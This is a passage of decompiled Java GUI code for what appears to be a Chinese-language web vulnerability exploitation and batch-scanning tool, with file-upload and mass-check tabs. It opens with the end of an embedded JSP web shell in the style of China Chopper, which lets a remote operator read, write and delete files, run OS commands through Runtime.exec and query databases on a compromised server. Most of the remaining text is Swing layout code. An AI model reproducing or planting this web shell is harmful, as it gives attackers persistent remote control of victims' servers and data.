z1=EC(request.getParameter(\"z1\")+\"\");String z2=EC(request.getParameter(\"z2\")+\"\");sb.append(\"->\"+\"|\");String s=request.getSession().getServletContext().getRealPath(\"/\");if(Z.equals(\"A\")){sb.append(s+\"\\t\");if(!s.substring(0,1).equals(\"/\")){AA(sb);}}else if(Z.equals(\"B\")){BB(z1,sb);}else if(Z.equals(\"C\")){String l=\"\";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+\"\\r\\n\");}br.close();}else if(Z.equals(\"D\")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.append(\"1\");}else if(Z.equals(\"F\")){FF(z1,response);}else if(Z.equals(\"G\")){GG(z1,z2);sb.append(\"1\");}else if(Z.equals(\"H\")){HH(z1,z2);sb.append(\"1\");}else if(Z.equals(\"I\")){II(z1,z2);sb.append(\"1\");}else if(Z.equals(\"J\")){JJ(z1);sb.append(\"1\");}else if(Z.equals(\"K\")){KK(z1,z2);sb.append(\"1\");}else if(Z.equals(\"L\")){LL(z1,z2);sb.append(\"1\");}else if(Z.equals(\"M\")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals(\"N\")){NN(z1,sb);}else if(Z.equals(\"O\")){OO(z1,sb);}else if(Z.equals(\"P\")){PP(z1,sb);}else if(Z.equals(\"Q\")){QQ(cs,z1,z2,sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z2.length()):s.replaceAll(\"\\\\\\\\\",\"/\")+\"images/\");}}catch(Exception e){sb.append(\"ERROR\"+\":// \"+e.toString());}sb.append(\"|\"+\"<-\");out.print(sb.toString());%>");
        this.scrollPane4.setViewportView(this.jtxt_fileContent);
        this.jcheckBox_use_user_path.setText("自定义路径");
        this.jcheckBox_use_user_path.setBackground(Color.white);
        GroupLayout groupLayout3 = new GroupLayout(this.panel3);
        this.panel3.setLayout(groupLayout3);
        groupLayout3.setHorizontalGroup(groupLayout3.createParallelGroup().addGroup(GroupLayout.Alignment.TRAILING, groupLayout3.createSequentialGroup().addGap(23, 23, 23).addGroup(groupLayout3.createParallelGroup(GroupLayout.Alignment.TRAILING).addComponent(this.scrollPane4, -1, 1179, 32767).addGroup(groupLayout3.createSequentialGroup().addComponent(this.label4, -2, 72, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jtxt_filepath, -2, 735, -2).addGap(85, 85, 85).addComponent(this.jcheckBox_use_user_path, -2, 144, -2).addPreferredGap(LayoutStyle.ComponentPlacement.UNRELATED).addComponent(this.jbtn_uploadFile))).addGap(18, 18, 18)));
        groupLayout3.setVerticalGroup(groupLayout3.createParallelGroup().addGroup(groupLayout3.createSequentialGroup().addContainerGap().addGroup(groupLayout3.createParallelGroup(GroupLayout.Alignment.TRAILING).addComponent(this.label4, -2, 28, -2).addGroup(groupLayout3.createParallelGroup(GroupLayout.Alignment.BASELINE).addComponent(this.jbtn_uploadFile).addComponent(this.jtxt_filepath, -2, -1, -2).addComponent(this.jcheckBox_use_user_path))).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.scrollPane4, -2, 271, -2).addContainerGap(50, 32767)));
        this.tabbedPane1.addTab("文件上传", this.panel3);
        this.label5.setText("线程：");
        this.j_combox_threadSize.setModel(new DefaultComboBoxModel(new String[]{"1", "2", "3", "4", "5", "10", "20", "30", "40", "50", "60", "70", "80", "90"}));
        this.j_combox_threadSize.setEditable(true);
        this.j_combox_threadSize.setSelectedIndex(5);
        this.label6.setText("文件路径：");
        this.jbtn_batch_check_import.setText("导 入");
        this.jbtn_batch_check_import.addActionListener(actionEvent7 -> {
            jbtn_batch_check_importActionPerformed(actionEvent7);
        });
        this.jbtn_batch_check_start.setText("开 始");
        this.jbtn_batch_check_start.addActionListener(actionEvent8 -> {
            jbtn_batch_check_startActionPerformed(actionEvent8);
        });
        this.jbtn_batch_check_stop.setText("停 止");
        this.jbtn_batch_check_stop.addActionListener(actionEvent9 -> {
            jbtn_batch_check_stopActionPerformed(actionEvent9);
        });
        this.label7.setText("用 时：");
        this.label8.setText("进 度：");
        this.jlable_useTime.setText("0");
        this.jlabel_check_status.setText("0/0");
        this.scrollPane5.addMouseListener(new MouseAdapter() { // from class: view.Tools.5
            public void mouseClicked(MouseEvent mouseEvent) {
                Tools.this.scrollPane5MouseClicked(mouseEvent);
            }
        });
        this.jtable_batch_check_result.setAutoCreateRowSorter(true);
        this.jtable_batch_check_result.setModel(new DefaultTableModel(new Object[0], new String[]{"序号", "Web服务器", "Url地址", "是否存在漏洞"}) { // from class: view.Tools.6
            boolean[] columnEditable = {false, false, true, true};

            public boolean isCellEditable(int i, int i2) {
                return this.columnEditable[i2];
            }
        });
        this.jtable_batch_check_result.addMouseListener(new MouseAdapter() { // from class: view.Tools.7
            public void mouseClicked(MouseEvent mouseEvent) {
                Tools.this.jtable_batch_check_resultMouseClicked(mouseEvent);
            }
        });
        this.scrollPane5.setViewportView(this.jtable_batch_check_result);
        GroupLayout groupLayout4 = new GroupLayout(this.panel4);
        this.panel4.setLayout(groupLayout4);
        groupLayout4.setHorizontalGroup(groupLayout4.createParallelGroup().addGroup(groupLayout4.createSequentialGroup().addContainerGap().addGroup(groupLayout4.createParallelGroup().addGroup(groupLayout4.createSequentialGroup().addComponent(this.scrollPane5, -1, 1208, 32767).addContainerGap()).addGroup(groupLayout4.createSequentialGroup().addComponent(this.label5, -2, 53, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.j_combox_threadSize, -2, 64, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.label6).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jtxt_batch_chek_path, -2, 317, -2).addGap(18, 18, 18).addComponent(this.jbtn_batch_check_import).addGap(18, 18, 18).addComponent(this.jbtn_batch_check_start).addGap(18, 18, 18).addComponent(this.jbtn_batch_check_stop).addGap(18, 18, 18).addComponent(this.label7).addPreferredGap(LayoutStyle.ComponentPlacement.UNRELATED).addComponent(this.jlable_useTime, -2, UnitValue.DIV, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.label8).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jlabel_check_status, -1, 137, 32767).addContainerGap(40, 32767)))));
        groupLayout4.setVerticalGroup(groupLayout4.createParallelGroup().addGroup(groupLayout4.createSequentialGroup().addContainerGap().addGroup(groupLayout4.createParallelGroup(GroupLayout.Alignment.BASELINE).addComponent(this.label5, -2, 29, -2).addComponent(this.label6).addComponent(this.jtxt_batch_chek_path, -2, -1, -2).addComponent(this.jbtn_batch_check_import).addComponent(this.jbtn_batch_check_start).addComponent(this.jbtn_batch_check_stop).addComponent(this.label7).addComponent(this.jlable_useTime).addComponent(this.label8).addComponent(this.jlabel_check_status).addComponent(this.j_combox_threadSize, -2, -1, -2)).addPreferredGap(LayoutStyle.ComponentPlacement.UNRELATED).addComponent(this.scrollPane5, -1, 309, 32767).addContainerGap()));
        this.tabbedPane1.addTab("批量检查", this.panel4);
        this.table.add(this.tabbedPane1, JLayeredPane.DEFAULT_LAYER);
        this.tabbedPane1.setBounds(10, 65, 1220, 395);
        this.jtxt_log.setLineWrap(true);
        this.jtxt_log.setRows(5);
        this.scrollPane2.setViewportView(this.jtxt_log);
        this.table.add(this.scrollPane2, JLayeredPane.DEFAULT_LAYER);
        this.scrollPane2.setBounds(10, 465, 1220, 135);
        this.jbtn_qun_start.setText("检测所有漏洞");
        this.jbtn_qun_start.addActionListener(actionEvent10 -> {
            jbtn_qun_startActionPerformed(actionEvent10);
        });
        this.table.add(this.jbtn_qun_start, JLayeredPane.DEFAULT_LAYER);
        this.jbtn_qun_start.setBounds(1020, 20, UnitValue.MIN, this.jbtn_qun_start.getPreferredSize().height);
        GroupLayout groupLayout5 = new GroupLayout(contentPane);
        contentPane.setLayout(groupLayout5);
        groupLayout5.setHorizontalGroup(groupLayout5.createParallelGroup().addComponent(this.table));
        groupLayout5.setVerticalGroup(groupLayout5.createParallelGroup().addComponent(this.table));
        setSize(1240, 650);
        setLocationRelativeTo(getOwner());
        this.jmenu_c_export.setText("导出结果");
        this.jmenu_c_export.addActionListener(actionEvent11 -> {
            jmenu_c_exportActionPerformed(actionEvent11);
        });
        this.jPopupMenu1.add(this.jmenu_c_export);
        this.jmenu_c_del_select_rows.setText("删除选中行");
        this.jmenu_c_del_select_rows.addActionListener(actionEvent12 -> {
            jmenu_c_del_select_rowsActionPerformed(actionEvent12);
        });
        this.jPopupMenu1.add(this.jmenu_c_del_select_rows);
        setExtendedState(6);
        setLocationRelativeTo(null);
    }
}
